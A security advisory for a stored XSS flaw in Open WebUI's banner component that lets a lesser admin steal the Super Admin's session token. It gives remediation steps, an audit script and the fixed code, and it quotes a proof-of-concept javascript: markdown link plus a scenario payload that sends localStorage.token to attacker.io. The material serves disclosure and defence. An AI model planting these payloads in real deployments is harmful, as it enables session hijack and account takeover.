CVE-2026-45665: open-webui: Stored XSS enables Super Admin session hijack

GHSA-cqp4-qqvg-3787 HIGH
Published May 14, 2026
CISO Take

Open WebUI contains a stored XSS vulnerability in its global banner component caused by an inverted sanitization pipeline: DOMPurify runs before marked.js converts markdown to HTML, so any `javascript:` URL embedded in markdown link syntax survives sanitization and is rendered as a live link in every user's browser, where it executes when clicked. The critical concern here is privilege escalation: a single compromised admin account, which is a realistic threat given password reuse and phishing in shared AI platform environments, is sufficient to plant a persistent payload that is shown to the Super Admin on every dashboard load. With a trivially simple one-line PoC requiring no special tools and 91 prior CVEs in this package signaling a historically vulnerable codebase, exploitation probability is high for organizations running Open WebUI as a shared local-LLM frontend. Immediately upgrade to v0.8.0, audit existing banner configurations for suspicious markdown link patterns, and rotate Super Admin session tokens if any banner content cannot be fully accounted for.

Sources: GitHub Advisory, NVD, ATLAS

What is the risk?

High severity (CVSS 8.1, Scope: Changed). While High privileges are required to inject the payload, the attack chains a low-bar initial access (one compromised admin) into a full Super Admin session takeover, effectively bypassing MFA because the stolen token represents an already-authenticated session. Open WebUI is widely deployed as a self-hosted AI chat frontend, often with minimal hardening and shared admin credentials. The Changed scope rating reflects that the attacker pivots from a limited admin account to the highest privilege tier on the platform. No CISA KEV listing and no public exploit kit yet, but the PoC is trivial and publicly disclosed in the security advisory.

Attack Kill Chain

  1. Initial Access (AML.T0012): Attacker obtains credentials for a limited admin account via phishing or credential stuffing, gaining authenticated access to Open WebUI's admin panel.

  2. Payload Injection (AML.T0049): Attacker navigates to Settings > Banners and saves a markdown-formatted banner containing a `javascript:` URI link, which bypasses DOMPurify because sanitization runs before markdown-to-HTML conversion.

  3. User Execution (AML.T0011.003): Super Admin loads the dashboard, sees the socially-engineered banner notification, and clicks the disguised malicious link, triggering JavaScript execution in their authenticated session context.

  4. Credential Theft & Privilege Escalation (AML.T0091.000): Executed JavaScript reads the Super Admin's session token from localStorage and exfiltrates it to an attacker-controlled endpoint, granting full platform control without triggering MFA.

What systems are affected?

| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| open-webui | npm | <= 0.7.2 | 0.8.0 |

Severity & Risk

CVSS 3.1: 8.1 / 10
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

Attack Surface

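Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): High
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): None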

What should I do?

  1. Patch immediately: upgrade to open-webui >= 0.8.0, which applies DOMPurify after `marked.parse()`, closing the sanitization gap.

  2. Audit all existing banners: navigate to Settings > Interface > UI > Banners and inspect all content for markdown links containing `javascript:`, `data:`, or other URI schemes. Delete any suspicious entries.

  3. Rotate Super Admin credentials and session tokens: if you cannot confirm banner integrity, treat Super Admin sessions as potentially compromised and force re-authentication.

  4. Restrict banner edit permissions: limit which admin accounts can modify global banners; apply principle of least privilege.

  5. Detection: review application logs for banner modification events (`POST /api/config` or equivalent) and correlate with admin accounts that were recently created, had password changes, or show anomalous login patterns.

  6. If CSP is deployed upstream (e.g., via reverse proxy), verify that `script-src` does not permit inline execution; this would have partially mitigated the `javascript:` href execution in some browser configurations.
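
The banner audit in step 2 can be scripted. The following is an added example, not code from Open WebUI or the advisory: it extracts markdown link targets from banner text and flags any whose scheme is not allowlisted, including targets obfuscated with case changes, character references or `<...>` wrapping. `ALLOWED_SCHEMES`, `auditBanner` and the sample banners are assumptions made for illustration; how banner text is exported from an instance is left to the operator.

```javascript
// Added example, not Open WebUI code. The scheme allowlist is an assumption.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// Undo obfuscations that still yield a working scheme once rendered:
// character references, backslash escapes, <...> wrapping, whitespace, case.
function normalise(target) {
  return target
    .replace(/&#(x[0-9a-f]+|\d+);?/gi, (_, n) => {
      const cp = /^x/i.test(n) ? parseInt(n.slice(1), 16) : parseInt(n, 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : '';
    })
    .replace(/&colon;/gi, ':').replace(/&(tab|newline);/gi, '')
    .replace(/[\u0000-\u0020\u007f<>\\]/g, '')
    .toLowerCase();
}

// Collect raw targets from inline links, reference definitions and autolinks.
function linkTargets(markdown) {
  const targets = [];
  for (let i = markdown.indexOf(']('); i !== -1; i = markdown.indexOf('](', i + 2)) {
    let depth = 1, j = i + 2;
    for (; j < markdown.length && depth > 0; j++) {
      if (markdown[j] === '\\') j++;          // skip the escaped character
      else if (markdown[j] === '(') depth++;  // targets may hold balanced parens
      else if (markdown[j] === ')') depth--;
    }
    targets.push(markdown.slice(i + 2, depth === 0 ? j - 1 : j));
  }
  for (const m of markdown.matchAll(/^ {0,3}\[[^\]]+\]:\s*(\S+)/gm)) targets.push(m[1]);
  for (const m of markdown.matchAll(/<([a-z][a-z0-9+.-]*:[^<>\s]*)>/gi)) targets.push(m[1]);
  return targets;
}

// One finding per distinct target whose scheme is outside the allowlist.
function auditBanner(content) {
  const findings = new Map();
  for (const raw of linkTargets(content)) {
    const norm = normalise(raw), m = /^([a-z][a-z0-9+.-]*):/.exec(norm);
    if (m && !ALLOWED_SCHEMES.has(m[1])) findings.set(norm, { scheme: m[1], raw });
  }
  return [...findings.values()];
}

// Constructed sample banners; the second is the PoC string quoted in the advisory.
const SAMPLE_BANNERS = [
  'Maintenance tonight, see [status](https://status.example.com/page_(1)).',
  '[Click for Security Update](javascript:alert(localStorage.token))',
  '[docs](<JaVa&#x09;Script:void(0)> "note: x") and [rel](/help "a:b")',
];
for (const b of SAMPLE_BANNERS) console.log(auditBanner(b));
```

Relative links and allowlisted schemes produce no finding, so any output is a banner entry to review by hand.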

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act: Art. 9 - Risk Management System
ISO 42001: A.6.2 - AI System Risk Management — Information Security Controls
NIST AI RMF: MANAGE 2.2 - Mechanisms are in place and applied to sustain the value of AI systems over time
OWASP LLM Top 10: LLM05 - Improper Output Handling

Frequently Asked Questions

Is CVE-2026-45665 actively exploited?

No confirmed active exploitation of CVE-2026-45665 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-45665?

This vulnerability affects the following AI/ML architecture patterns: AI chat interfaces, local LLM deployments, multi-user AI platforms, model serving frontends.

What is the CVSS score for CVE-2026-45665?

CVE-2026-45665 has a CVSS v3.1 base score of 8.1 (HIGH).

Technical Details

NVD Description

### Summary

A Stored Cross-Site Scripting (XSS) vulnerability exists in the Banner component due to an improper sanitization order (specifically, DOMPurify is executed before the marked library). This vulnerability allows a compromised or malicious administrator to plant a malicious payload in the global banner. Crucially, this vector enables Privilege Escalation, as the malicious banner is rendered for all users, including the Super Admin (Primary Admin). Consequently, the payload successfully bypasses the existing security mechanism. An attacker can leverage this to steal the Super Admin's session token.

### Details

Root Cause: The code attempts to sanitize the input using `DOMPurify.sanitize()` before parsing it with `marked.parse()`. DOMPurify cleans the raw input. Since `[Link](javascript:alert(javascript:alert(localStorage.token)))` is valid text (not HTML), it passes through DOMPurify unchanged. marked handles the text and converts it into a clickable HTML link: `<a href="javascript:alert(javascript:alert(localStorage.token))">Link</a>`. This resulting unsafe HTML is rendered directly via `{@html ...}` without further checks.

`src/lib/components/common/Banner.svelte` (Line 103)

```svelte
{@html marked.parse(DOMPurify.sanitize((banner?.content ?? '').replace(/\n/g, '<br>')))}
```

### POC

1. **Attacker Action:** Log in as a compromised Admin account and navigate to **Settings > Interface > UI > Banners**.

2. **Injection:** Add a new banner and enter the following payload in the content field. This payload creates a link that alerts the user's session token when clicked.

   ```markdown
   [Click for Security Update](javascript:alert(localStorage.token))
   ```

3. **Execution:** Click **Save**. The malicious banner is now stored and active.

4. **Victim Action (Privilege Escalation):** The **Primary Admin** logs in and sees the banner on the main dashboard. Believing it to be a system notification, they click the link.

   **Victim Dashboard View:** [screenshot]

5. **Result:** The JavaScript executes immediately within the Primary Admin's session, exposing their full-access token.

### Impact

Extend permissions and damage to the entire system. You need administrator privileges to create banners, but this vulnerability is important because it can attack primary administrators and other administrators.

- Destination: Other Administrators / Primary Administrators.
- Attack Vector: Corrupting all administrator accounts (even those with limited scope if future granular privileges exist or simply credentials are compromised) could allow an attacker to set traps for the default administrator.
- The result: Unlike self-XSS or simple administrator configuration changes, this allows you to capture active sessions for the most privileged users and bypass authentication controls such as MFA (because the session is already active).

### Recommended Patch

Modify `src/lib/components/common/Banner.svelte` (Line 103):

```
{@html DOMPurify.sanitize(marked.parse((banner?.content ?? '').replace(/\n/g, '<br>')))}
```

## Resolution

Fixed in **v0.8.0**. [`src/lib/components/common/Banner.svelte:103`](https://github.com/open-webui/open-webui/blob/main/src/lib/components/common/Banner.svelte#L103) now applies the sanitization in the correct order: `DOMPurify.sanitize(marked.parse(...))`. `marked.parse` runs first and converts `[text](javascript:...)` markdown into the corresponding HTML link element; `DOMPurify.sanitize` then strips the `javascript:` URL and any other dangerous attributes/elements before the result reaches `{@html ...}`. Users on `>= 0.8.0` are not affected.

Exploitation Scenario

An adversary targets an organization using Open WebUI as their internal AI assistant platform. Through a phishing campaign against a lower-privileged admin, the attacker obtains credentials for an account with banner management rights. The attacker authenticates, navigates to banner settings, and creates a banner reading `[Security Notice — Action Required](javascript:fetch('https://attacker.io/collect?t='+localStorage.token))` with a plausible subject line designed to invite clicks. The banner is saved and immediately rendered across the entire platform. When the Super Admin next logs in and sees what appears to be an urgent system notice, they click the link. The malicious JavaScript executes in their authenticated browser context, exfiltrating their session token to the attacker's server. The attacker replays the token to authenticate as Super Admin, gaining access to all model API keys, user data, and system configuration — all without triggering MFA since the session was already established.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

Timeline

Published: May 14, 2026
Last Modified: May 14, 2026
First Seen: May 15, 2026
